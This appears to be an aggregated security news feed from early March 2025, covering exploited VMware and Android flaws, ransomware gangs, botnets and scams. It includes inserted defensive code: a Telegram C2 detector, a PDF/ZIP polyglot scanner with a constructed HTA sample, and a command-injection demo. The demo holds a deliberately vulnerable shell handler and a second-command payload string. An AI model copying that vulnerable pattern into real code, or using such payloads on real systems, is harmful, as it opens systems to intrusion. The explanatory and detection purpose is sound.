Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-50302, Linux Kernel Use of Uninitialized Resource Vulnerability; CVE-2025-22225, VMware ESXi Arbitrary Write Vulnerability; CVE-2025-22224, VMware ESXi and Workstation TOCTOU Race Condition Vulnerability; CVE-2025-22226, VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability. The first issue, tracked as CVE-2024-50302, was addressed by Google with the release of the Android March 2025 security update. Below are the descriptions for these vulnerabilities: CVE-2025-22224 (CVSS score of 9.3) VMCI heap-overflow vulnerability: the vulnerability is a TOCTOU (Time-of-Check Time-of-Use) issue in VMware ESXi and Workstation that can lead to an out-of-bounds write. "


    Trump will "probably" cut Mexico and Canada tariffs - US commerce chief

    latam
    2025-03-05 https://www.bbc.com/news/articles/c5yx02nnnyvo
Canada's Minister of Foreign Affairs told the BBC's Newsnight her office had not been contacted about the plan. "

    Autosummary: "


    Android zero-day vulnerabilities actively abused. Update as soon as you can

    exploits
    2025-03-05 https://www.malwarebytes.com/blog/news/2025/03/android-zero-day-vulnerabilities-actively-abused-update-as-soon-as-you-can
Android's March 2025 security update includes two zero-days which are under active exploitation in targeted attacks. "

    Autosummary: For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "


    Chinese APT Lotus Panda Targets Governments With New Sagerunex Backdoor Variants

    government
    2025-03-05 https://thehackernews.com/2025/03/chinese-apt-lotus-panda-targets.html
    The threat actor known as Lotus Panda has been observed targeting government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan with updated versions of a known backdoor called Sagerunex. "Lotus Blossom has been using the Sagerunex backdoor since at least 2016 and is increasingly employing long-term persistence command shells and developing "

    Autosummary: The threat actor known as Lotus Panda has been observed targeting government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan with updated versions of a known backdoor called Sagerunex. "


    Identity: The New Cybersecurity Battleground

    ciber
    2025-03-05 https://thehackernews.com/2025/03/identity-new-cybersecurity-battleground.html
    The rapid adoption of cloud services, SaaS applications, and the shift to remote work have fundamentally reshaped how enterprises operate. These technological advances have created a world of opportunity but also brought about complexities that pose significant security threats. At the core of these vulnerabilities lies Identity—the gateway to enterprise security and the number one attack vector "

Autosummary: Checklist: Can your Identity solution… □ Seamlessly integrate with your key enterprise SaaS applications, e.g., your CRM, productivity, collaboration, ERP, and IT ops management apps? The path to Identity-first security: Identity-first security creates an open, efficient, and secure ecosystem for managing apps and systems without silos, custom integrations, or security gaps. Ask yourself, can your Identity solution… □ Give you visibility into all threats across all systems, devices, and types, and customer accounts? "


    Polish Space Agency POLSA disconnected its network following a cyberattack

    ciber
    2025-03-05 https://securityaffairs.com/174930/security/polish-space-agency-polsa-disconnected-its-network-following-a-cyberattack.html
    The Polish space agency POLSA announced it has disconnected its network from the internet following a cyberattack. The Polish space agency POLSA was forced to disconnect its network from the internet in response to a cyberattack. The agency revealed that it has disconnected its infrastructure to contain the attack and secure data, a circumstance that […] "

Autosummary: Polish Space Agency POLSA disconnected its network following a cyberattack. Pierluigi Paganini, March 05, 2025. The Polish space agency POLSA announced it has disconnected its network from the internet following a cyberattack. — Polska Agencja Kosmiczna (@POLSA_GOV_PL) March 2, 2025. We cannot rule out an attack by a nation-state actor, especially Russia, given the country’s strategic support for Ukraine in the ongoing conflict. "


    BadBox malware disrupted on 500K infected Android devices

    exploits
    2025-03-05 https://www.bleepingcomputer.com/news/security/badbox-malware-disrupted-on-500k-infected-android-devices/
    The BadBox Android malware botnet has been disrupted again by removing 24 malicious apps from Google Play and sinkholing communications for half a million infected devices. [...] "

Autosummary: Since then, it is estimated that the botnet has grown to over 1,000,000 infections, impacting Android devices in 222 countries, with most located in Brazil (37.6%), the United States (18.2%), Mexico (6.3%), and Argentina (5.3%). "Devices connected to the BADBOX 2.0 operation included lower-price-point, "off brand", uncertified tablets, connected TV (CTV) boxes, digital projectors, and more," explains HUMAN. "


    YouTube warns of AI-generated video of its CEO used in phishing attacks

    financial
    2025-03-05 https://www.bleepingcomputer.com/news/security/youtube-warns-of-ai-generated-video-of-its-ceo-used-in-phishing-attacks/
YouTube warns that scammers are using an AI-generated video featuring the company's CEO in phishing attacks to steal creators' credentials. [...] "

    Autosummary: Phishing landing page (BleepingComputer) The scammers also create a sense of urgency by threatening that their accounts will be restricted for seven days if they fail to confirm compliance with the new rules (these restrictions would allegedly include uploading new videos, editing old videos, receiving monetization, and receiving earned monetization funds). "


Toronto Zoo shares update on last year's ransomware attack

    exploits ransomware
    2025-03-05 https://www.bleepingcomputer.com/news/security/toronto-zoo-shares-update-on-last-years-ransomware-attack/
    The Toronto Zoo, the largest zoo in Canada, has provided more information about the data stolen during a ransomware attack in January 2024. [...] "

    Autosummary: In a final notification regarding the cyberattack, the Toronto Zoo said the resulting data breach impacts varying combinations of personal and financial information belonging to employees, former employees, volunteers, and donors. "


I spoke to a task scammer. Here’s how it went

    financial
    2025-03-05 https://www.malwarebytes.com/blog/news/2025/03/i-spoke-to-a-task-scammer-heres-how-it-went
    Task scams are increasing in volume. We followed up on an invitation by a task scammer to get a first hand look on how they work. "

Autosummary: Do not respond to unsolicited job offers via text messages or messaging apps. Never pay to get paid. Verify the legitimacy of the employer through official channels. Don’t trust anyone who offers to pay you for something illegal such as rating or liking things online. It’s also important to keep in mind that legitimate employers do not ask employees to pay for the opportunity to work. Task scammers prey on people looking for remote jobs by offering them simple repetitive tasks such as liking videos, optimizing apps, boosting product interest, or rating product images. How to avoid task scams: As I pointed out, all the task scam invitations I received came to me in the form of Message requests on X. So, that’s a good place to be very cautious. The Telegram invitation was a bit more limited (European and American female users only) but extended to a larger group of 150 accounts on X. What the ones that reached out to me had in common was that they all found my profile on X. Mind you, my profile is not some honeytrap, it clearly says I blog for Malwarebytes. "


    Cactus ransomware: what you need to know

    exploits ransomware
    2025-03-05 https://www.tripwire.com/state-of-security/cactus-ransomware-what-you-need-know
Cactus is a ransomware-as-a-service (RaaS) group that encrypts victim's data and demands a ransom for a decryption key. Read more about it in my article on the Tripwire State of Security blog. "

Autosummary: Once Cactus has infected a PC, it will attempt to uninstall anti-virus software, hunt for potential targets for infection, and use a variety of techniques to steal information and files before they are encrypted. After files have been exfiltrated and encrypted, a ransom note is posted on the victim's computer with the filename "cAcTuS.readme.txt". Encrypted files can be identified easily as their extensions will have been changed to .cts1 "


    Google Rolls Out AI Scam Detection for Android to Combat Conversational Fraud

    financial
    2025-03-05 https://thehackernews.com/2025/03/google-rolls-out-ai-scam-detection-for.html
    Google has announced the rollout of artificial intelligence (AI)-powered scam detection features to secure Android device users and their personal information. "These features specifically target conversational scams, which can often appear initially harmless before evolving into harmful situations," Google said. "And more phone calling scammers are using spoofing techniques to hide their real "

    Autosummary: "If you turn on Enhanced Protection, much of the additional protection you receive comes from advanced AI and machine learning models designed to spot dangerous URLs engaging in known phishing, social engineering, and scam techniques," the company said. "


    New Eleven11bot botnet infected +86K IoT devices

    industry
    2025-03-05 https://securityaffairs.com/174941/malware/new-eleven11bot-botnet-infected-86k-iot-devices.html
    The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). Researchers from Nokia Deepfield Emergency Response Team (ERT) discovered a new botnet named Eleven11bot that has already infected over 86,000 IoT devices. Most infected devices are security cameras and network video recorders (NVRs), which are used to launch […] "

Autosummary: New Eleven11bot botnet infected +86K IoT devices. Pierluigi Paganini, March 05, 2025. The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). "


Google's March 2025 Android Security Update Fixes Two Actively Exploited Vulnerabilities

    exploits
    2025-03-04 https://thehackernews.com/2025/03/googles-march-2025-android-security.html
    Google has released its monthly Android Security Bulletin for March 2025 to address a total of 44 vulnerabilities, including two that it said have come under active exploitation in the wild. The two high-severity vulnerabilities are listed below - CVE-2024-43093 - A privilege escalation flaw in the Framework component that could result in unauthorized access to "Android/data," "Android/obb," "

    Autosummary: "


    Building cyber resilience in banking: Expert insights on strategy, risk, and regulation

    financial
    2025-03-04 https://www.helpnetsecurity.com/2025/03/04/matthew-darlage-citizens-banks-cyber-resilience/

    In this Help Net Security interview, Matthew Darlage, CISO at Citizens, discusses key strategies for strengthening cyber resilience in banks. He underlines that adherence to frameworks like NIST is essential for continuous improvement and that data protection measures are critical to safeguarding bank operations. Darlage further argues that third-party risk management and adaptable security practices are necessary for maintaining resilience. What are the core pillars of an effective cyber resilience strategy for banks? My general … More

    The post Building cyber resilience in banking: Expert insights on strategy, risk, and regulation appeared first on Help Net Security.

    "

    Autosummary: Thinking about supply chain and third-party risks, contractual safeguards are key, including right to audit clauses, SLAs, shared responsibilities, etc., as well as having a joint understanding of all the foundational/core pillars we talked about earlier (data protection, strong access, risk management practices etc.,). My general view is that an effective cyber resilience and defense in-depth strategy relies on a fair amount of foundational pillars including, but not limited to, having a solid traditional GRC program and executing strong risk management practices, robust and fault-tolerant security infrastructure, strong incident response capabilities, regularly tested disaster recovery/resilience plans, strong vulnerability management practices, awareness and training campaigns, and a comprehensive third-party risk management program. "


    Cybersecurity jobs available right now: March 4, 2025

    ciber
    2025-03-04 https://www.helpnetsecurity.com/2025/03/04/cybersecurity-jobs-available-right-now-march-4-2025/

    Application Security Engineer Via | Israel | Hybrid – View job details As a Application Security Engineer, you will perform security assessments, including penetration testing, vulnerability scanning, and code reviews, to identify security weaknesses in applications. Define and implement application security testing strategies, including static analysis, dynamic analysis, and software composition analysis. Cloud Security Architect Kinaxis | Canada | Hybrid – View job details As a Cloud Security Architect, you will lead and participate in … More

    The post Cybersecurity jobs available right now: March 4, 2025 appeared first on Help Net Security.

    "

Autosummary: ICT/Cyber Security Engineer Honeywell | Italy | On-site – View job details As an ICT/Cyber Security Engineer, you will contribute to the designing, engineering, configuring, implementing, commissioning, securing and supporting of ICT infrastructure (Server, Storage, Network, Virtual Platforms) and enterprise applications at both new and existing client sites. Cybersecurity Threat & Vulnerability | Manager | Cyber Security | Technology Consulting PwC | Ireland | Hybrid – View job details As a Cybersecurity Threat & Vulnerability | Manager | Cyber Security | Technology Consulting, you will conduct security assessments, red team exercises, web application penetration testing, vulnerability assessment and secure configuration review to identify risks and recommend appropriate remediation measures. IT Security Engineer Dataiku | France | Hybrid – View job details As an IT Security Engineer, you will be part of the design, implementation and running of a broad range of security controls, including but not limited to identity management, endpoint security, data leakage prevention, and security of the various cloud components used in Dataiku. "


    Cisco, Hitachi, Microsoft, and Progress Flaws Actively Exploited—CISA Sounds Alarm

    exploits
    2025-03-04 https://thehackernews.com/2025/03/cisco-hitachi-microsoft-and-progress.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added five security flaws impacting software from Cisco, Hitachi Vantara, Microsoft Windows, and Progress WhatsUp Gold to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The list of vulnerabilities is as follows - CVE-2023-20118 (CVSS score: 6.5) - A command injection "

    Autosummary: "


    CISA maintains stance on Russian cyber threats despite policy shift

    rusia-ucrania
    2025-03-04 https://securityaffairs.com/174862/intelligence/cisa-maintains-stance-on-russian-cyber-threats-despite-policy-shift.html
    US CISA confirms no change in defense against Russian cyber threats despite the Trump administration’s pause on offensive operations. US CISA stated there is no change in defending against Russian cyber threats, despite the Trump administration’s temporary pause on offensive cyber operations. US Defense Secretary Pete Hegseth has recently ordered US Cyber Command to pause […] "

Autosummary: CISA maintains stance on Russian cyber threats despite policy shift. Pierluigi Paganini, March 04, 2025. US CISA confirms no change in defense against Russian cyber threats despite the Trump administration’s pause on offensive operations. "


    Google fixes Android zero-day exploited by Serbian authorities

    exploits
    2025-03-04 https://www.bleepingcomputer.com/news/security/google-fixes-android-zero-days-exploited-in-targeted-attacks/
Google has released patches for 43 vulnerabilities in Android's March 2025 security update, including two zero-days. Serbian authorities have used one of the zero-days to unlock confiscated devices. [...] "

    Autosummary: "


    Mass exploitation campaign hit 4,000+ ISP networks to deploy info stealers and crypto miners

    exploits
    2025-03-04 https://securityaffairs.com/174873/cyber-crime/massive-attack-deploy-info-stealers-crypto-miners.html
    A massive attack targets ISPs in China and the U.S. West Coast to deploy info stealers and crypto miners on compromised systems. The Splunk Threat Research Team discovered a mass exploitation campaign from Eastern Europe targeting ISPs in China and the U.S. West Coast to deploy info stealers and crypto miners. Threat actors use weak […] "

    Autosummary: “The actions observed by this actor during the entrenchment and subsequent operations within the targeted hosts appear to rely on scripting languages (e.g., Python-compiled executables, PowerShell commands) reducing the footprint of these operations to the minimum, disabling defense mechanisms, blocking remote access and avoiding detection by using Telegram API calls to the C2.” concludes the report. "
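The report above notes that the operator used Telegram API calls as its command-and-control channel. A simple way to surface that from outbound proxy logs is to flag any non-allowlisted server talking to the Telegram Bot API and to pull out the bot ID (never the full token) so that hosts beaconing to the same bot can be grouped. The following is an added example, not Splunk's detection or the report's own code; the log format (timestamp, source host, method, URL, status) and the sample lines are constructed for this illustration, and the allowlisted host name is hypothetical.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Telegram Bot API URLs look like https://api.telegram.org/bot<bot_id>:<token>/<method>.
# The bot_id is useful for correlation; the token is a credential and is not stored.
TELEGRAM_BOT_RE = re.compile(
    r"^https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<api_method>\w+)"
)
# Matches the host alone, which is all a CONNECT (TLS tunnel) entry reveals.
TELEGRAM_HOST_RE = re.compile(r"^https?://api\.telegram\.org(?:[:/]|$)")

# Hypothetical: hosts that legitimately use Telegram (e.g. a chat-ops notifier).
ALLOWED_HOSTS: Set[str] = {"chatops-01"}

# Constructed sample proxy log: "<timestamp> <src_host> <method> <url> <status>".
SAMPLE_LOG = """\
2025-03-01T10:00:01Z srv-web-03 POST https://api.telegram.org/bot123456789:AAEexampletokenvalue_XYZ/sendMessage 200
2025-03-01T10:00:02Z srv-web-03 GET https://update.example-isp.net/check 200
2025-03-01T10:00:05Z chatops-01 POST https://api.telegram.org/bot987654321:BBFanotherexampletoken/sendMessage 200
2025-03-01T10:00:09Z srv-db-01 POST https://api.telegram.org/bot123456789:AAEexampletokenvalue_XYZ/sendDocument 200
2025-03-01T10:00:12Z srv-db-01 CONNECT https://api.telegram.org:443 200
"""


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    bot_id: Optional[str]      # None when only the host is visible (CONNECT)
    api_method: Optional[str]  # e.g. sendMessage, sendDocument


def parse_line(line: str):
    """Split one constructed log line into its five fields, or None if malformed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, host, method, url, status = parts
    return ts, host, method, url, status


def detect(log_text: str, allowed_hosts: Set[str] = ALLOWED_HOSTS) -> List[Finding]:
    """Return one Finding per Telegram API request from a host not on the allowlist."""
    findings: List[Finding] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ts, host, _method, url, _status = rec
        if host in allowed_hosts or not TELEGRAM_HOST_RE.match(url):
            continue
        m = TELEGRAM_BOT_RE.match(url)
        findings.append(Finding(
            ts=ts,
            host=host,
            bot_id=m.group("bot_id") if m else None,
            api_method=m.group("api_method") if m else None,
        ))
    return findings


def bots_by_host(findings: List[Finding]) -> Dict[str, Set[str]]:
    """Group bot IDs per source host; the same bot ID on several hosts points at one operator."""
    out: Dict[str, Set[str]] = {}
    for f in findings:
        if f.bot_id:
            out.setdefault(f.host, set()).add(f.bot_id)
    return out


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
    print(bots_by_host(detect(SAMPLE_LOG)))
```

With TLS interception you get the full path and can extract the bot ID and method; without it you only see the CONNECT to api.telegram.org, which is why the host-only match is kept as a weaker signal rather than dropped.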


    New polyglot malware hits aviation, satellite communication firms

    exploits
    2025-03-04 https://www.bleepingcomputer.com/news/security/new-polyglot-malware-hits-aviation-satellite-communication-firms/
    A previously undocumented polyglot malware is being deployed in attacks against aviation, satellite communication, and critical transportation organizations in the United Arab Emirates. [...] "

    Autosummary: One of the PDF lures used in the attacks Source: Proofpoint The main benefit of using polyglots is evasion, as most security tools will inspect the first file format (PDF), which is a benign document, and completely ignore the malicious hidden portion (HTA/ZIP payloads). "
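Because a PDF parser stops at the trailer while a ZIP parser starts from the end of the file, a PDF/ZIP polyglot satisfies both and a scanner that only honours the first format misses the archive. The scanner below is an added example (not Proofpoint's or any vendor's code) of checking both ends of a file: it records how many bytes trail the last `%%EOF`, lets Python's `zipfile` locate an archive with data prepended in front of it, and looks inside the members for HTA markers. The sample "lure" is constructed in memory, so the script runs offline; the marker list and size cap are this example's own choices.

```python
import io
import zipfile
from typing import Dict, List

PDF_MAGIC = b"%PDF-"
PDF_EOF = b"%%EOF"
ZIP_EOCD = b"PK\x05\x06"    # ZIP end-of-central-directory signature (read from the end)
ZIP_LOCAL = b"PK\x03\x04"   # ZIP local file header signature
# Strings typical of an HTA payload (chosen for this example, case-insensitive).
HTA_MARKERS = (b"<hta:application", b"<script", b"activexobject", b"wscript.shell")
MAX_MEMBER_BYTES = 4 * 1024 * 1024  # do not inflate oversized members (zip-bomb guard)


def _hta_hits(blob: bytes) -> List[str]:
    low = blob.lower()
    return [m.decode() for m in HTA_MARKERS if m in low]


def scan_file(data: bytes) -> dict:
    """Report whether a blob is a PDF that also carries a ZIP and/or HTA content."""
    report: Dict = {
        "is_pdf": data.startswith(PDF_MAGIC),
        "bytes_after_eof": 0,
        "zip_members": [],
        "hta_hits": {},       # member name (or "<raw>") -> markers seen
        "verdict": "clean",
    }
    eof = data.rfind(PDF_EOF)
    tail = data[eof + len(PDF_EOF):] if eof != -1 else data
    report["bytes_after_eof"] = len(tail) if eof != -1 else 0

    # zipfile, like the attacker's loader, finds the EOCD from the end of the
    # file and tolerates arbitrary bytes (here, the PDF) before the archive.
    if ZIP_EOCD in data and ZIP_LOCAL in data:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    report["zip_members"].append(info.filename)
                    if info.file_size <= MAX_MEMBER_BYTES:
                        hits = _hta_hits(zf.read(info))
                        if hits:
                            report["hta_hits"][info.filename] = hits
        except zipfile.BadZipFile:
            pass  # PK bytes occurred inside a PDF stream; not a usable archive

    # An HTA appended in clear (no ZIP) shows up directly after the PDF trailer.
    raw_hits = _hta_hits(tail)
    if raw_hits:
        report["hta_hits"]["<raw>"] = raw_hits

    if report["is_pdf"] and (report["zip_members"] or report["hta_hits"]):
        report["verdict"] = "polyglot"
    return report


def build_clean_pdf() -> bytes:
    # Constructed minimal PDF-shaped document (enough structure for the scanner).
    return (b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


def build_polyglot() -> bytes:
    # Constructed lure: the clean document followed by a ZIP holding an HTA.
    hta = (b'<html><hta:application id="x"/>'
           b'<script>new ActiveXObject("WScript.Shell");</script></html>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payload.hta", hta)
    return build_clean_pdf() + buf.getvalue()


if __name__ == "__main__":
    print(scan_file(build_clean_pdf()))
    print(scan_file(build_polyglot()))
```

The verdict deliberately requires the archive to parse, not merely the presence of `PK` bytes, since those can occur inside legitimate PDF streams; the count of bytes after the last `%%EOF` is a cheap triage signal on its own.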


    Polish Space Agency offline as it recovers from cyberattack

    ciber
    2025-03-04 https://www.bleepingcomputer.com/news/security/polish-space-agency-offline-as-it-recovers-from-cyberattack/
The Polish Space Agency (POLSA) has been offline since it disconnected its systems from the Internet over the weekend to contain a breach of its IT infrastructure. [...] "

Autosummary: CSIRT NASK, together with CSIRT MON, supports POLSA in activities aimed at restoring the operational functioning of the Agency," said Krzysztof Gawkowski, Poland's Minister of Digital Affairs. "


    Hunters International ransomware claims attack on Tata Technologies

    exploits ransomware
    2025-03-04 https://www.bleepingcomputer.com/news/security/hunters-international-ransomware-claims-attack-on-tata-technologies/
The Hunters International ransomware gang has claimed responsibility for a January cyberattack on Tata Technologies, stating they stole 1.4TB of data from the company. [...] "

    Autosummary: Founded in 1989 and based in Pune, it operates in 27 countries with over 12,500 employees, specializing in automotive, aerospace, and industrial sectors with product development and digital transformation services. "


    Broadcom fixes three VMware zero-days exploited in attacks

    exploits
    2025-03-04 https://www.bleepingcomputer.com/news/security/broadcom-fixes-three-vmware-zero-days-exploited-in-attacks/
    Broadcom warned customers today about three VMware zero-days, tagged as exploited in attacks and reported by the Microsoft Threat Intelligence Center. [...] "

    Autosummary: "


    CISA refutes claims it has been ordered to stop monitoring Russian cyber threats

    rusia-ucrania
    2025-03-04 https://www.bitdefender.com/en-us/blog/hotforsecurity/cisa-refutes-ordered-stop-monitoring-russian-cyber-threats
It's been a confusing few days in the world of American cybersecurity... Read more in my article on the Hot for Security blog. "

    Autosummary: "


    VMware Security Flaws Exploited in the Wild—Broadcom Releases Urgent Patches

    exploits
    2025-03-04 https://thehackernews.com/2025/03/vmware-security-flaws-exploited-in.html
    Broadcom has released security updates to address three actively exploited security flaws in VMware ESXi, Workstation, and Fusion products that could lead to code execution and information disclosure. The list of vulnerabilities is as follows - CVE-2025-22224 (CVSS score: 9.3) - A Time-of-Check Time-of-Use (TOCTOU) vulnerability that leads to an out-of-bounds write, which a malicious actor with "

    Autosummary: "


    Google fixed two actively exploited Android flaws

    exploits
    2025-03-04 https://securityaffairs.com/174887/hacking/google-fixed-android-actively-exploited-flaws.html
    Android March 2025 security update addresses over 40 vulnerabilities, including two flaws actively exploited in attacks in the wild. Android March 2025 security update addressed over 40 vulnerabilities, including two flaws, respectively tracked as CVE-2024-43093 and CVE-2024-50302, which are actively exploited in attacks in the wild. “There are indications that the following may be under […] "

Autosummary: Google fixed two actively exploited Android flaws. Pierluigi Paganini, March 04, 2025. Android March 2025 security update addresses over 40 vulnerabilities, including two flaws actively exploited in attacks in the wild. "


    Google expands Android AI scam detection to more Pixel devices

    financial
    2025-03-04 https://www.bleepingcomputer.com/news/security/google-expands-android-ai-scam-detection-to-more-pixel-devices/
    Google has announced an increased rollout of new AI-powered scam detection features on Android to help protect users from increasingly sophisticated phone and text social engineering scams. [...] "

Autosummary: The new Scam Detection features in action (Source: Google). This feature was first announced in November 2024 and has been tested on a small set of Pixel 6+ devices, but it is now being rolled out to all English-speaking Pixel 9 users in the U.S. Pixel 9 users will get the feature through Gemini Nano, while Pixel 6 to 8 series devices enrolled in Phone by Google beta will be restricted to less powerful Google AI models. "


    Researchers Link CACTUS Ransomware Tactics to Former Black Basta Affiliates

    exploits ransomware industry
    2025-03-04 https://thehackernews.com/2025/03/researchers-link-cactus-ransomware.html
    Threat actors deploying the Black Basta and CACTUS ransomware families have been found to rely on the same BackConnect (BC) module for maintaining persistent control over infected hosts, a sign that affiliates previously associated with Black Basta may have transitioned to CACTUS. "Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute "

    Autosummary: "Threat actors are using these tactics, techniques, and procedures (TTP) — vishing, Quick Assist as a remote tool, and BackConnect — to deploy Black Basta ransomware," Trend Micro said. "


    Microsoft Teams tactics, malware connect Black Basta, Cactus ransomware

    exploits ransomware industry
    2025-03-04 https://www.bleepingcomputer.com/news/security/microsoft-teams-tactics-malware-connect-black-basta-cactus-ransomware/
    New research has uncovered further links between the Black Basta and Cactus ransomware gangs, with members of both groups utilizing the same social engineering attacks and the BackConnect proxy malware for post-exploitation access to corporate networks. [...] "

Autosummary: Zloader, Qbot, and BackConnect are all believed to be linked to the Black Basta ransomware operation, with members utilizing the malware to breach and spread through corporate networks. "


    PayPal scam abuses Docusign API to spread phishy emails

    financial
    2025-03-04 https://www.malwarebytes.com/blog/news/2025/03/paypal-scam-abuses-docusign-api-to-spread-phishy-emails
    Phishers are once again using the Docusign API to send out fake documents, this time looking as if they come from PayPal. "

Autosummary: "We’ve identified an unauthorized transaction made from your PayPal account to Coinbase: Amount: $755.38 Transaction ID: PP-5284440 To safeguard your account and process an immediate refund, you must contact our Fraud Prevention Team at: +1 (866) 379-5160 Our representatives are available 24/7 to assist you in resolving this issue and preventing any additional unauthorized activity." If you’ve received an email like this and want to verify if it’s genuine, go directly to Docusign.com, click ‘Access Documents’ (upper right-hand corner), and enter the security code displayed in the email. "


    VMware fixed three actively exploited zero-days in ESX products

    exploits
    2025-03-04 https://securityaffairs.com/174911/security/vmware-fixed-three-actively-exploited-zero-days-in-esx-products.html
    Broadcom has addressed three VMware zero-day vulnerabilities in ESX products that are actively exploited in the wild. Broadcom released security updates to address three VMware zero-day vulnerabilities in ESX products that are actively exploited in the wild. The flaws, respectively tracked as CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, impact multiple VMware ESX products, including VMware ESXi, vSphere, […] "

    Autosummary: Below are the descriptions for these vulnerabilities: CVE-2025-22224 (CVSS score of 9.3), VMCI heap-overflow vulnerability: a TOCTOU (Time-of-Check Time-of-Use) issue in VMware ESXi and Workstation that can lead to an out-of-bounds write. "


    Hong Kong billionaire to sell Panama Canal ports to US firm

    latam
    2025-03-04 https://www.bbc.com/news/articles/clyzlk259g2o
    BlackRock will buy two ports after Trump's interest in taking back control of the key shipping route. "

    Autosummary: In a statement announcing the business deal, Frank Sixt, co-managing director of CK Hutchison, said: "I would like to stress that the transaction is purely commercial in nature and wholly unrelated to recent political news reports concerning the Panama Ports. "


    Supreme Court wary of Mexico's fight against US gunmakers

    latam
    2025-03-04 https://www.bbc.com/news/articles/cgm1jr9pzw4o
    Mexico accuses US firms of practices that help arm gangs, but the US gun trade association denies wrongdoing. "

    Autosummary: The Mexican lawsuit also suggests that some weapons are being manufactured and decorated specifically to the tastes of cartel members, such as a gold-plated pistol known as the "Super El Jefe", Spanish for "the boss". In the long-running lawsuit, Mexico's government argues that the "flood" of illegal guns across the border is a result of "deliberate" practices by US firms. "


    Qilin ransomware gang claimed responsibility for the Lee Enterprises attack

    exploits ransomware
    2025-03-03 https://securityaffairs.com/174831/data-breach/qilin-ransomware-group-claims-responsibility-lee-enterprises-attack.html
    The Qilin ransomware group claimed responsibility for the recent cyberattack on Lee Enterprises, which impacted dozens of local newspapers, and says it stole 350GB of data. Lee Enterprises, Inc. is a publicly traded American media company. It publishes 79 newspapers in 25 states, and more than […] "

    Autosummary: “The documents we hold about Lee Enterprises reveal details worth noting—investor records, financial arrangements that raise questions, payments to journalists and publishers, funding for tailored news stories, and approaches to obtaining insider information.” (Pierluigi Paganini, March 03, 2025) "


    Commix: Open-source OS command injection exploitation tool

    exploits
    2025-03-03 https://www.helpnetsecurity.com/2025/03/03/commix-open-source-os-command-injection-exploitation-tool/

    Commix is an open-source penetration testing tool designed to automate the detection and exploitation of command injection vulnerabilities, streamlining security assessments for researchers and ethical hackers. Commix features:
    Easy to use: Commix simplifies the process of identifying and exploiting command injection flaws in vulnerable parameters and HTTP headers, reducing the manual effort required.
    Portable: The tool includes everything needed to conduct effective command injection attacks across various operating systems and applications.
    Modular: Users can extend … More

    The post Commix: Open-source OS command injection exploitation tool appeared first on Help Net Security.

    "

    Autosummary: "
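    An added example, not code from the Commix project or from the article above: the class of bug that Commix automates finding and exploiting, shown as a vulnerable handler beside a hardened one. `echo` is an assumption standing in for a realistic command such as `ping` so the example runs anywhere with /bin/sh, and the hostname allow-list regex is the example's own choice, not a Commix feature.

```python
"""Added example (not Commix or Help Net Security code): OS command
injection in a vulnerable handler versus a hardened one. `echo` stands in
for a realistic command such as `ping`; the allow-list regex is assumed."""
import re
import subprocess

# Assumption for the example: hostnames are restricted to RFC 1123 labels.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_vulnerable(host: str) -> str:
    """Vulnerable: user input is spliced into a shell command line.
    A value like 'example.com; id' makes /bin/sh run a second command."""
    completed = subprocess.run(f"echo {host}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def run_hardened_unvalidated(host: str) -> str:
    """Argv form, no shell: metacharacters reach the program as literal
    text, so ';' no longer separates commands (shown for comparison)."""
    completed = subprocess.run(["echo", host], capture_output=True, text=True)
    return completed.stdout


def validate_hostname(host: str) -> str:
    """Allow-list validation: reject anything that is not a plain hostname."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return host


def run_hardened(host: str) -> str:
    """Hardened: validated input passed as one argv element, no shell."""
    completed = subprocess.run(["echo", validate_hostname(host)],
                               capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print("vulnerable :", repr(run_vulnerable(payload)))
    print("argv only  :", repr(run_hardened_unvalidated(payload)))
    try:
        run_hardened(payload)
    except ValueError as exc:
        print("hardened   :", exc)
```

    With the payload `example.com; echo INJECTED`, the vulnerable handler prints `INJECTED` on its own line (the shell ran a second command), the argv-only form prints the whole payload verbatim, and the validated form refuses the input. Both halves of the fix matter: the argv form removes the shell, the allow-list keeps the argument from steering the target program's own option parsing.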


    The New Ransomware Groups Shaking Up 2025

    exploits ransomware
    2025-03-03 https://thehackernews.com/2025/03/the-new-ransomware-groups-shaking-up.html
    In 2024, global ransomware attacks hit 5,414, an 11% increase from 2023. After a slow start, attacks spiked in Q2 and surged in Q4, with 1,827 incidents (33% of the year's total). Law enforcement actions against major groups like LockBit caused fragmentation, leading to more competition and a rise in smaller gangs. The number of active ransomware groups jumped 40%, from 68 in 2023 to 95 "

    Autosummary: IOCs (Type, Value, Last Observation Date):
    IPv4-Addr 107.161.50.26 (Nov 28, 2024)
